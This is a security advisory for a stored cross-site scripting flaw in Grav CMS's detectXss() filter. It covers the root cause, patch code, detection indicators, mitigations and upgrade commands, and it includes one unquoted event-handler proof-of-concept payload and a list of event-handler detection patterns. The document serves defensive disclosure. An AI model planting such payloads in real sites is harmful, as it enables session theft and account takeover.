CVE-2026-42612 Overview
CVE-2026-42612 is a stored Cross-Site Scripting (XSS) vulnerability in Grav, a file-based PHP content management system maintained by getgrav. The flaw exists in the detectXss() function, which fails to identify unquoted HTML event attributes during its blacklist-based filtering. Publisher-level accounts can inject persistent JavaScript that executes in the browser of any user who views the affected content. The vulnerability is fixed in Grav 2.0.0-beta.2.
Critical Impact
Authenticated publishers can store arbitrary JavaScript in Grav content, leading to session theft, account takeover of higher-privileged users, and pivoting through the administrative interface.
Affected Products
- Getgrav Grav versions prior to 2.0.0-beta.2
- Getgrav Grav 2.0.0-beta1
- Grav deployments exposing the admin/publishing interface to multiple user roles
Discovery Timeline
- 2026-05-11 - CVE-2026-42612 published to NVD
- 2026-05-12 - Last updated in NVD database
Technical Details for CVE-2026-42612
Vulnerability Analysis
The vulnerability is classified as Cross-Site Scripting [CWE-79]. Grav uses a function named detectXss() to inspect user-supplied HTML for dangerous constructs before storing or rendering it. The function operates as a denylist, matching known dangerous patterns such as quoted event handlers and javascript: URIs.
The denylist fails to normalize attribute syntax before matching. HTML parsers accept event handler attributes without surrounding quotes, for example <img src=x onerror=alert(1)>. The detection routine does not match this unquoted form, allowing the payload to pass validation. Once stored, the page renderer emits the attacker-controlled markup verbatim, and the browser executes the JavaScript in the context of the Grav origin.
Exploitation requires a publisher-level account, so the attack is authenticated. The payload persists in Grav content files and triggers for every viewer, including administrators with higher privileges.
Root Cause
The root cause is incomplete input validation in detectXss(). The function relies on a denylist that does not account for the full lexical flexibility of the HTML attribute grammar. Unquoted event attributes are functionally equivalent to quoted ones in browsers, but they are not equivalent to the regex patterns used for detection.
Attack Vector
An attacker with publisher privileges submits content containing an unquoted event handler through the Grav editor or content API. The detectXss() filter approves the input, and Grav writes it to disk. When any user requests the affected page, the malicious script executes under the Grav domain, enabling cookie theft, CSRF against admin endpoints, and privilege escalation.
// Security patch in system/src/Grav/Common/Media/Traits/MediaObjectTrait.php
// Restricts attribute names to safe identifiers and rejects event handlers,
// inline style, srcdoc, XML namespace, and form* attributes.
public function attribute($attribute = null, $value = '')
{
if (empty($attribute) || !is_string($attribute)) {
return $this;
}
if (!self::isSafeAttributeName($attribute)) {
return $this;
}
$this->attributes[$attribute] = $value;
return $this;
}
Source: Grav security commit 5a12f9b
Detection Methods for CVE-2026-42612
Indicators of Compromise
- Grav content files (.md, .yaml, page data) containing unquoted HTML event handlers such as onerror=, onload=, or onmouseover= without surrounding quotes
- Unexpected <script>, <svg>, or <img> elements introduced by non-administrator accounts
- Outbound browser requests from administrator sessions to attacker-controlled domains shortly after viewing publisher-authored content
Detection Strategies
- Audit page content authored by publisher-role accounts for HTML event attributes and inline JavaScript
- Compare current page files against version control history to surface unauthorized markup insertions
- Inspect web server access logs for admin sessions issuing unusual POST requests immediately after rendering publisher content
Monitoring Recommendations
- Enable Content Security Policy (CSP) reporting to capture blocked inline-script execution attempts in Grav-rendered pages
- Monitor authentication logs for new or escalated administrator sessions originating from browsers that loaded publisher-authored pages
- Alert on file modifications to the user/pages/ directory performed by non-administrator accounts
How to Mitigate CVE-2026-42612
Immediate Actions Required
- Upgrade Grav to version 2.0.0-beta.2 or later, which replaces the denylist logic and hardens attribute handling
- Review and revoke unnecessary publisher-role accounts and rotate session tokens for all privileged users
- Audit existing page content for malicious markup and remove or sanitize affected files before re-enabling the admin interface
Patch Information
The fix is delivered in commit 5a12f9be8314682c8713e569e330f11805d0a663 and tracked under GHSA-9695-8fr9-hw5q. The patch introduces an allowlist for attribute names through isSafeAttributeName(), rejecting on*, style, srcdoc, XML namespace, and form* attributes, and hardens archive extraction against Zip Slip.
Workarounds
- Restrict the publisher role to trusted users only until the upgrade is applied
- Deploy a strict Content Security Policy that disallows inline scripts and unsafe-eval to limit XSS impact
- Place a web application firewall rule in front of Grav that blocks request bodies containing unquoted event handler attributes
# Verify installed Grav version and upgrade via the CLI
bin/grav -v
bin/gpm selfupgrade
# Confirm post-upgrade version is 2.0.0-beta.2 or later
bin/grav -v
Disclaimer: This content was generated using AI. While we strive for accuracy, please verify critical information with official sources.
